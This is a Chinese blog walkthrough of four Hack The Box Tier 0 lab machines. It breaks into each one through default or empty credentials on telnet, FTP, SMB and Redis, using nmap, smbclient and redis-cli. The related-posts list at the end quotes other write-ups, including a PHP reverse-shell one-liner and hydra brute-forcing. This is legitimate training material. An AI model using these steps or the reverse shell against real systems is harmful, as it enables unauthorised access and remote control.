Hack the box -- 靶机渗透测试(TIER0)

最新推荐文章于 2023-02-03 09:54:28 发布
最新推荐文章于 2023-02-03 09:54:28 发布
阅读量893 收藏 1
点赞数
文章标签: 网络 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wjishuxiaobai/article/details/125316157
版权

Hack the box -- 靶机渗透测试(TIER0)

写在前面

本文针对Hack the box 靶机渗透过程进行记录。

TIER 0

Meow

开启在线靶机,靶机IP为10.129.10.113。
在这里插入图片描述

  1. 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.50.113
    在这里插入图片描述
    发现其开放了23端口的telnet服务,即可以提供远程登陆。所以我们尝试使用telnet连接目标主机。
    不出所料需要密码进行登陆。
    在这里插入图片描述

  2. 猜测密码,尝试登陆
    使用常见的密码如admin、administrator、root等,发现输入root成功登陆。
    在这里插入图片描述

  3. 查找Flag
    在这里插入图片描述

总结
至此,靶机Meow已成功攻破。

Fawn

开启在线靶机,靶机IP为10.129.149.89。
在这里插入图片描述

  1. 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.149.89
    在这里插入图片描述
    发现其在21端口开启了ftp服务,且nmap提示可以使用Anonymous进行登陆

  2. 尝试使用FTP服务连接靶机
    账号为:anonymous 密码为空(或者任意),成功连接。
    在这里插入图片描述

  3. 寻找flag
    在这里插入图片描述
    总结
    至此,靶机Fawn已成功攻破。

Dancing

开启在线靶机,靶机IP为10.129.15.117。
在这里插入图片描述

  1. 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.15.117。发现在445端口运行着smb,所以尝试将此作为突破口。
    在这里插入图片描述
  2. 使用smbclient连接目标主机。发现需要输入密码,这里直接使用空密码跳过,可以得到smb中共享内容的名称。
    在这里插入图片描述
    尝试对各个内容进行连接,发现WorkShares可以进行空密码连接。发现其中有Amy.J中的worknotes.txt与James.P中的flag.txt文件。

在这里插入图片描述
在这里插入图片描述
总结
至此,靶机Dancing已成功攻破。

Redeemer

开启在线靶机,靶机IP为10.129.51.201。
在这里插入图片描述

  1. 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.74.32,发现没有扫描出可用端口。由于Nmap默认扫描的端口是1000个,但是实际上电脑的端口范围是0-65535个。所以加入 -p- 参数实现全端口扫描。完整命令为nmap -p- -v -sV -sC 10.129.74.32(注:全端口扫描可能需要等待一段时间,可以在扫描过程中键入x进行进度查询)。发现目标主机在6379 端口开启了redis服务,所以尝试从此切入。
    在这里插入图片描述
  2. 通过redis-cli尝试连接。
    通过sudo apt install redis-tools 进行安装。基本用法如下:
    在这里插入图片描述
    按照其用法输入命令 redis-cli -h 10.129.74.32 尝试连接成功。
    在这里插入图片描述
    通过输入 info 查看redis服务信息与状态,发现数据库名与Key个数,通过查看数据库内容发现flag
    在这里插入图片描述
    在这里插入图片描述
    总结
    至此,靶机Redeemer已成功攻破。

总结

TIER0中主要包含了telnet远程登录FTPSMB以及redis。由于是第一个靶机,所以相对比较简单,更多的是熟悉Hack the box 中靶机渗透操作流程。

li hack
关注
hack the box archetype靶场
qq_42754807的博客
05-28 1207
hack the box archetype
Hack The Box - STARTING POINT
小小郭的博客
03-06 2645
Hack The Box - STARTING POINT
hack the box netmon靶机
zr1213159840的博客
04-14 1372
本来看着这个靶机,觉得应该不难吧,结果还是看了不少东西才学会。按照惯例,先开扫 nmap -sV -Pn -A 10.10.10.152 这个地方有几个有用的信息,第一个,ftp匿名,第二个,80端口跑了服务。打开后,能看到以下页面,同时注意这个服务的名字,后面要找和这个名字相关的配置文件等等: 通过扫描的结果能知道ftp端口是能够匿名登录的,那我就不客气了,直接登录。注意注意,这个匿名登录也是要输入账户名的,账户名anonymous。(这个地方多说几句,我才开始匿名不输入,直接回车,我还想为啥登录不
Hack the box靶机 Arctic
菜浪马废的博客
06-03 437
找到后台登录地址 coldfusion 8 搜索漏洞 找到可以上传的地方 需要payload 使用MS10-059 https://github.com/Re4son/Chimichurri 完成
Hack the box -- 靶机渗透测试TIER2)
wjishuxiaobai的博客
06-25 2125
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
hack the box optimum靶机
zr1213159840的博客
04-21 2296
首先打开靶场,直接nmap开扫。 nmap -sV -Pn -A 10.10.10.8 通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞 search hfs 使用下面的hfs的命令执行,然后看下要配置哪些东西 use 1 options 需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。 set RHOSTS 10.10.10.8 set LHOSTS 10.10.14.17 run 利用成功后,返回me
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
最新发布
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律...
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Unified
Start C的博客
05-18 1337
本次探讨在一个非常著名的网络设备监控系统“UniFi”中利用 Log4J 的效果。这台靶机展示了如何设置和安装必要的软件包和工具,以通过滥用 Log4J 漏洞利用 UniFi 并操纵名为 remember 的 POST 标头,为您提供机器上的反向 shell。您还将通过更改系统上运行的 MongoDB 实例中保存的哈希值来更改管理员密码,这将允许访问管理面板并导致管理员的 SSH 密码泄露。 涉及内容:UniFi、CVE检索、Log4J、JNDI、LDAP、MongoDB、提权、SSH 废话不多说,开扫:
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Oopsie
Start C的博客
05-18 675
每当执行包含身份验证机制的 Web 评估时,始终建议检查 cookie、会话并尝试弄清楚访问控制的真正工作原理。 在许多情况下,远程代码执行攻击和系统立足点本身可能无法实现,而是在链接不同类型的漏洞和漏洞之后实现。 在此框中,我们将了解信息泄露和访问控制损坏类型的漏洞,即使它们看起来不是很重要,也会在攻击系统时产生很大的影响,因此即使是很小的漏洞也很重要。 先扫描一下:namp -sV -sC 10.129.133.42 开放了3个TCP端口,22 ssh,80 http,还有一个10626。 既然有8.
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Appointment
Start C的博客
04-19 706
因为俺是一个学生,所以只打HTB免费的靶机。。。 这一关的类型是SQL相关。 TASK 1,SQL是什么?Structured query language,结构化查询语言。 TASK 2,一种最常见的SQL漏洞类型?以n结尾,很明显是SQL注入,即SQL Injection TASK 3,PII是什么?Personally Identifiable Information。 用户数据保护中的常用术语,搜索一下: 个人可识别信息(PII,Personally Identifiable Inform
Hack The Box - TIER 0 - Meow Fawn Dancing
Tajang的大千世界
03-01 7522
初探HTB
Hack The Box 靶机
PJF1501105594的博客
10-24 2271
Hack The Box 邀请码获取 控制台执行makeInviteCode() 查看返回的json data 然后按照对应的编码格式进行解码,按照要求进行获取邀请码即可 see: https://www.jianshu.com/p/1201a0d2cdfe hackthebox 入门攻略: https://www.360zhijia.com/anquan/439315.html h...
Hack The Box靶机——Ambassador
qq_44029310的博客
10-10 1065
本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consul命令执行。
Hack the box靶机 Blunder
菜浪马废的博客
09-20 493
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
Hack the box靶机 Mirai
菜浪马废的博客
05-26 263
goole一下默认密码 登录失败 但是可以ssh 开始说在usb设备里 usb设备里有文件 查看发现说被删除了 让我们找回 重点不在于提权了 考核的就是一个找回文件 写着写着突然不想睡了 想再来一个靶机… ...
hack the box靶场oopsie靶机
zr1213159840的博客
03-21 1771
打开靶机,看一下第一个问题: 问:什么可以拦截本地的流量? 答案:看着y结尾,应该是proxy,输入正确 第二问: 问:登录界面在什么文件夹下面? 答案:/cdn-cgi/login。知道这个页面的最直接的方式是f12后看下页面,能看到有一个cdn-cgi/login相关的信息。同时,根据提示,可以使用burpsuite爬取,这也是更加合适的方式,因为爬取能提供我们下一步信息。 在burpsuite中爬取这个网站,操作就是拦截数据包后在target中右击网站选择spider this host即可。然
Hack the box靶机 nineveh
菜浪马废的博客
05-20 523
添加10.10.10.43 nineveh.htb 到/etc/hosts 扫描网站目录 发现一个登录页面 直接hydra爆破账号 admin:1q2w3e4r5t 继续hydra admin:password123 查看漏洞 没有返回 好像是必须在名称中包含ninevehNotes 可以了现在 nc连接 php -r ‘$sock=fsockopen(“10.10.16.118”,1234);exec("/bin/sh -i <&3 >&3 2&gt.
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1805
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
hacknos靶机-----1
ppbgi的博客
05-19 163
进行虚拟机的安装 参考文档:https://www.w3xue.com/exp/article/20212/69978.html 接下来开始操作 一、利用kali自带的nmap进行ip的扫描 在进行开放端口的扫描: 在本地的浏览器进行访问,成功! 接下来进行目录的扫描: 进行敏感文件的查看,得到了drupal的版本,然后利用msf进行操作: 拿到shell之后,开始进行提权; 生成密码,在kali本地进行下载: 然后在靶机的操作界面中输入: python3 -c 'impo.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值